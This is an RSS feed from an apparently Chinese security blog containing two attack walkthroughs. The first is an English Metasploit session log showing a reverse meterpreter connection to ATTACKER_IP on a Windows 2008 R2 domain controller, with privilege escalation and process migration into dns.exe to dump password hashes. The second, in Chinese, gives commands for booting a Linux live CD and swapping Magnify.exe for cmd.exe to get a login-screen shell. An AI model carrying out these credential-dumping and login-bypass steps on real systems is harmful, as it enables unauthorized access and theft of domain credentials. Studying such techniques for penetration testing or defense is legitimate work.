<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Chinadu&#039;s Blog &#187; windows 2008</title>
	<atom:link href="http://www.4shell.org/archives/tag/windows-2008/feed" rel="self" type="application/rss+xml" />
	<link>http://www.4shell.org</link>
	<description>关注网络安全</description>
	<lastBuildDate>Fri, 10 Feb 2012 03:53:40 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Dumping Hashes on Win2008 R2 x64 with Metasploit</title>
		<link>http://www.4shell.org/archives/1971.html</link>
		<comments>http://www.4shell.org/archives/1971.html#comments</comments>
		<pubDate>Mon, 13 Jun 2011 12:57:38 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[windows 2008]]></category>

		<guid isPermaLink="false">http://www.4shell.org/?p=1971</guid>
		<description><![CDATA[When trying to dump password hashes on a Windows 2008 R2 64 bit box I constantly run into the “The parameter is incorrect” error in meterpreter. So I’ve had to fall back on dropping binaries which I really don’t like doing because of the added clean up and chance of getting ‘caught’. Well, with a [...]]]></description>
			<content:encoded><![CDATA[<p>When trying to dump password hashes on a Windows 2008 R2 64 bit box I constantly run into the “The parameter is incorrect” error in meterpreter. So I’ve had to fall back on dropping binaries which I really don’t like doing because of the added clean up and chance of getting ‘caught’. Well, with a bit of migration you’ll be back to passing the hash. Here is how, with a bit of the thought process first:</p>
<p>                    ##                          ###           ##    ##<br />
     ##  ##  #### ###### ####  #####   #####    ##    ####        ######<br />
    ####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##<br />
    ####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##<br />
    ## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##<br />
    ##   ##  #### ###   #####   #####     ##   ####   ####   #### ###<br />
                                          ##</p>
<p>           =[ metasploit v3.7.1-release [core:3.7 api:1.0]<br />
    + -- --=[ 687 exploits - 364 auxiliary - 43 post<br />
    + -- --=[ 217 payloads - 27 encoders - 8 nops<br />
           =[ svn r12622 updated today (2011.05.15)</p>
<p>    msf ><br />
    [*] DC_IP:49220 Request received for /AYSBk...<br />
    [*] DC_IP:49220 Staging connection for target YSBk received...<br />
    [*] Patching Target ID YSBk into DLL<br />
    [*] DC_IP:49221 Request received for /BYSBk...<br />
    [*] DC_IP:49221 Stage connection for target YSBk received...<br />
    [*] Meterpreter session 7 opened (ATTACKER_IP:443 -> DC_IP:49221) at Sun May 15 21:37:31 +0000 2011</p>
<p>    msf > sessions -i 7<br />
    [*] Starting interaction with 7...</p>
<p>    meterpreter > sysinfo<br />
    System Language : en_US<br />
    OS              : Windows 2008 R2 (Build 7601, Service Pack 1).<br />
    Computer        : DOMAINCONTROLLE<br />
    Architecture    : x64 (Current Process is WOW64)<br />
    Meterpreter     : x86/win32</p>
<p>    meterpreter > ps</p>
<p>    Process list<br />
    ============</p>
<p>     PID   Name                                       Arch  Session  User                          Path<br />
     ---   ----                                       ----  -------  ----                          ----<br />
     0     [System Process]<br />
     4     System                                     x64   0<br />
     224   smss.exe                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe<br />
     324   csrss.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe<br />
     364   csrss.exe                                  x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe<br />
     372   wininit.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe<br />
     404   winlogon.exe                               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe<br />
     468   services.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe<br />
     476   lsass.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe<br />
     484   lsm.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe<br />
     628   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe<br />
     708   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe<br />
     804   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe<br />
     836   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe<br />
     880   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe<br />
     932   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe<br />
     972   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe<br />
     328   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe<br />
     1172  spoolsv.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe<br />
     1204  Microsoft.ActiveDirectory.WebServices.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe<br />
     1252  dfsrs.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfsrs.exe<br />
     1288  dns.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dns.exe<br />
     1316  ismserv.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\ismserv.exe<br />
     1360  svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe<br />
     1392  vmtoolsd.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe<br />
     1464  wlms.exe                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wlms\wlms.exe<br />
     1492  dfssvc.exe                                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfssvc.exe<br />
     1572  VMUpgradeHelper.exe                        x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe<br />
     1896  TPAutoConnSvc.exe                          x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe<br />
     2016  vds.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe<br />
     872   sppsvc.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe<br />
     1268  WmiPrvSE.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WmiPrvSE.exe<br />
     2360  taskhost.exe                               x64   1        SITTINGDUCK\juser             C:\Windows\System32\taskhost.exe<br />
     2424  dwm.exe                                    x64   1        SITTINGDUCK\juser             C:\Windows\System32\dwm.exe<br />
     2452  explorer.exe                               x64   1        SITTINGDUCK\juser             C:\Windows\explorer.exe<br />
     2504  TPAutoConnect.exe                          x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe<br />
     2512  conhost.exe                                x64   1        SITTINGDUCK\juser             C:\Windows\System32\conhost.exe<br />
     2632  VMwareTray.exe                             x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\VMwareTray.exe<br />
     2640  VMwareUser.exe                             x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\VMwareUser.exe<br />
     2716  mmc.exe                                    x64   1        SITTINGDUCK\juser             C:\Windows\System32\mmc.exe<br />
     3052  mscorsvw.exe                               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe<br />
     2216  TrustedInstaller.exe                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe<br />
     1932  mscorsvw.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe<br />
     2564  svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe<br />
     1732  msdtc.exe                                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe<br />
     2992  notepad.exe                                x86   1        SITTINGDUCK\juser             C:\Windows\SysWOW64\notepad.exe<br />
     1720  notepad.exe                                x64   1        SITTINGDUCK\juser             C:\Windows\System32\notepad.exe</p>
<p>    meterpreter > getpid<br />
    Current pid: 2992</p>
<p>    meterpreter > hashdump<br />
    [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.</p>
<p>Ah, the wonderful ‘The parameter is incorrect’ error. Ok we are an admin since we can see the user for SYSTEM processes, so that isn’t the issue, but lets do a ‘getprivs’ just in case:</p>
<p>    meterpreter > getprivs<br />
    ============================================================<br />
    Enabled Process Privileges<br />
    ============================================================<br />
      SeDebugPrivilege<br />
      SeIncreaseQuotaPrivilege<br />
      SeMachineAccountPrivilege<br />
      SeSecurityPrivilege<br />
      SeTakeOwnershipPrivilege<br />
      SeLoadDriverPrivilege<br />
      SeSystemProfilePrivilege<br />
      SeSystemtimePrivilege<br />
      SeProfileSingleProcessPrivilege<br />
      SeIncreaseBasePriorityPrivilege<br />
      SeCreatePagefilePrivilege<br />
      SeBackupPrivilege<br />
      SeRestorePrivilege<br />
      SeShutdownPrivilege<br />
      SeSystemEnvironmentPrivilege<br />
      SeChangeNotifyPrivilege<br />
      SeRemoteShutdownPrivilege<br />
      SeUndockPrivilege<br />
      SeEnableDelegationPrivilege<br />
      SeManageVolumePrivilege</p>
<p>    meterpreter > hashdump<br />
    [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.</p>
<p>Boo.. Ok, so maybe we have to be ‘SYSTEM’…</p>
<p>    meterpreter > getsystem<br />
    ...got system (via technique 1).</p>
<p>    meterpreter > hashdump<br />
    [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.</p>
<p>Still nothing… Maybe it requires that we be in a 64 bit process… PID 1720 was 64 bit version of Notepad, lets try that…</p>
<p>    meterpreter > migrate 1720<br />
    [*] Migrating to 1720...<br />
    [*] Migration completed successfully.</p>
<p>    meterpreter > hashdump<br />
    [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.</p>
<p>Damn, what about as ‘SYSTEM’…</p>
<p>    meterpreter > getsystem ...got system (via technique 1).</p>
<p>    meterpreter > hashdump</p>
<p>    [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.</p>
<p>No joy.. hmmm What about a ‘SYSTEM’ process that was already there.. ‘dns.exe’ PID 1288 should be good…</p>
<p>    meterpreter > migrate 1288<br />
    [*] Migrating to 1288...<br />
    [*] Migration completed successfully.</p>
<p>    meterpreter > hashdump<br />
    Administrator:500:MYLMHASH:MYNTLMHASH:::<br />
    Guest:501:MYLMHASH:MYNTLMHASH:::<br />
    krbtgtG:502:MYLMHASH:MYNTLMHASH:::<br />
    Domain Admin?:1000:MYLMHASH:MYNTLMHASH:::<br />
    juserN:1104:MYLMHASH:MYNTLMHASH:::<br />
    jane.user??:1105:MYLMHASH:MYNTLMHASH:::<br />
    DOMAINCONTROLLE$?:1001:MYLMHASH:MYNTLMHASH:::</p>
<p>    meterpreter > </p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年01月22日 -- <a href="http://www.4shell.org/archives/1487.html" title="绕过 Windows Server 2008的密码保护">绕过 Windows Server 2008的密码保护</a></li><li>2008年11月20日 -- <a href="http://www.4shell.org/archives/649.html" title="Metasploit Framework 3.2 Released 最新版">Metasploit Framework 3.2 Released 最新版</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1971.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>绕过 Windows Server 2008的密码保护</title>
		<link>http://www.4shell.org/archives/1487.html</link>
		<comments>http://www.4shell.org/archives/1487.html#comments</comments>
		<pubDate>Fri, 22 Jan 2010 02:29:23 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[windows 2008]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1487.html</guid>
		<description><![CDATA[Windows Server 2008是微软Windows服务器产品中最新的操作系统版本。它是基于Windows NT 6.0 SP1的内核。 Microsoft详细信息：http://www.microsoft.com/china/windowsserver2008/ 虽然与早期版本相比非常安全，但它可以很容易地绕过密码保护进入主机。 在本文中，我将展示一个简单而有效的方法绕过Windows Server 2008的密码保护。 概念演示： 为了能够绕过密码保护，我们首先需要添加PING CD盘(http://ping.windowsdream.com/ping/Releases/3.00.01/PING-3.00.iso)或其他支持 NTFS-3G驱动的Linux Live光盘（NTFS-3G是一个跨平台执行的Windows NTFS文件系统，支持读/写能力）。 我们首先检查哪个分区是Windows NTFS分区，在这个例子中是/dev/sd1。 fdisk –l &#124; grep NTFS 然后，我们创建目录，将安装Windows文件： mkdir –p /mnt/windows 因此，我们将Windows分区中的NTFS-3G驱动挂载到/mnt/Windows目录中： mount –t ntfs-3g /dev/sda1/mnt/windows 现在，我们将一个可执行文件cmd.exe替换为Magnify.exe文件： mv Magnify.exe Magnify.bck cp cmd.exe Magnify.exe 然后在我们上面描述的过程中，我们重启机器并还原到Windows Server 2008。 正如下面所看到的，我们可以选择“Make items on the screen larger(Magnifier)”选项，并自动打开命令提示符窗口。 另一方法可用于Windows Vista操作系统和任何其他类似方式的系统，重命名“utilman.exe”为“cmd.exe”。 相关文章2011年06月13日 -- Dumping Hashes [...]]]></description>
			<content:encoded><![CDATA[<p><span style="color: #ff0000;">Windows  Server 2008是微软Windows服务器产品中最新的操作系统版本。它是基于Windows NT 6.0 SP1的内核。<br />
Microsoft详细<span style="color: #ff0000;">信息：</span><a href="http://www.microsoft.com/china/windowsserver2008/"><span style="color: #ff0000;">http://www.microsoft.com/china/windowsserver2008/</span></a></span></p>
<p><span style="color: #ff0000;"> 虽然与早期版本相比非常安全，但它可以很容易地绕过密码保护进入主机。</span><span style="color: #ff0000;"><br />
在本文中，我将展示一个简单而有效的方法绕过Windows Server 2008的密码保护。</span></p>
<p><span style="color: #ff0000;"><br />
概念演示：<br />
为了能够绕过密码保护，我们首先需要添加PING CD盘(</span><a href="http://ping.windowsdream.com/ping/Releases/3.00.01/PING-3.00.iso"><span style="color: #ff0000;">http://ping.windowsdream.com/ping/Releases/3.00.01/PING-3.00.iso</span></a><span style="color: #ff0000;">)或其他支持 NTFS-3G驱动的Linux Live光盘（NTFS-3G是一个跨平台执行的Windows NTFS文件系统，支持读/写能力）。</span></p>
<p><span style="color: #ff0000;"> 我们首先检查哪个分区是Windows NTFS分区，在这个例子中是/dev/sd1。<br />
<span style="color: #00ff00;">fdisk –l | grep NTFS</span></span></p>
<p><span style="color: #ff0000;"> 然后，我们创建目录，将安装Windows文件：<br />
<span style="color: #00ff00;">mkdir –p /mnt/windows</span></span></p>
<p><span style="color: #ff0000;"> 因此，我们将Windows分区中的NTFS-3G驱动挂载到/mnt/Windows目录中：<br />
<span style="color: #00ff00;">mount –t ntfs-3g /dev/sda1/mnt/windows</span></span></p>
<p><span style="color: #ff0000;"> 现在，我们将一个可执行文件cmd.exe替换为Magnify.exe文件：<br />
<span style="color: #00ff00;">mv Magnify.exe Magnify.bck<br />
cp cmd.exe Magnify.exe</span><br />
<a href="http://photo.blog.sina.com.cn/showpic.html#blogid=51af865b0100cs9b&amp;url=http://static6.photo.sina.com.cn/orignal/51af865bt63d3c0e6a425" target="_blank"><img src="http://www.4shell.org/wp-content/uploads/images/2010/01/102922yKW.jpg" alt="" /></a></span></p>
<p><span style="color: #ff0000;"><a href="http://photo.blog.sina.com.cn/showpic.html#blogid=51af865b0100cs9b&amp;url=http://static6.photo.sina.com.cn/orignal/51af865bt63d3c0e6a425" target="_blank"></a><span id="more-1487"></span><br />
然后在我们上面描述的过程中，我们重启机器并还原到Windows Server 2008。</span></p>
<p><span style="color: #ff0000;"> 正如下面所看到的，我们可以选择“Make items on the screen larger(Magnifier)”选项，并自动打开命令提示符窗口。<br />
<a href="http://photo.blog.sina.com.cn/showpic.html#blogid=51af865b0100cs9b&amp;url=http://static2.photo.sina.com.cn/orignal/51af865bt63d3c1e6b611" target="_blank"><img src="http://www.4shell.org/wp-content/uploads/images/2010/01/1029227mU.jpg" alt="" /></a><br />
<a href="http://photo.blog.sina.com.cn/showpic.html#blogid=51af865b0100cs9b&amp;url=http://static13.photo.sina.com.cn/orignal/51af865bt63d3cc2de96c" target="_blank"><img src="http://www.4shell.org/wp-content/uploads/images/2010/01/1029225MW.jpg" alt="" /> </a><br />
<a href="http://photo.blog.sina.com.cn/showpic.html#blogid=51af865b0100cs9b&amp;url=http://static12.photo.sina.com.cn/orignal/51af865bt63d3ccf2a8db" target="_blank"><img src="http://www.4shell.org/wp-content/uploads/images/2010/01/102923JZO.jpg" alt="" /> </a><br />
另一方法可用于Windows Vista操作系统和任何其他类似方式的系统，重命名“utilman.exe”为“cmd.exe”。</span></p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2011年06月13日 -- <a href="http://www.4shell.org/archives/1971.html" title="Dumping Hashes on Win2008 R2 x64 with Metasploit">Dumping Hashes on Win2008 R2 x64 with Metasploit</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1487.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

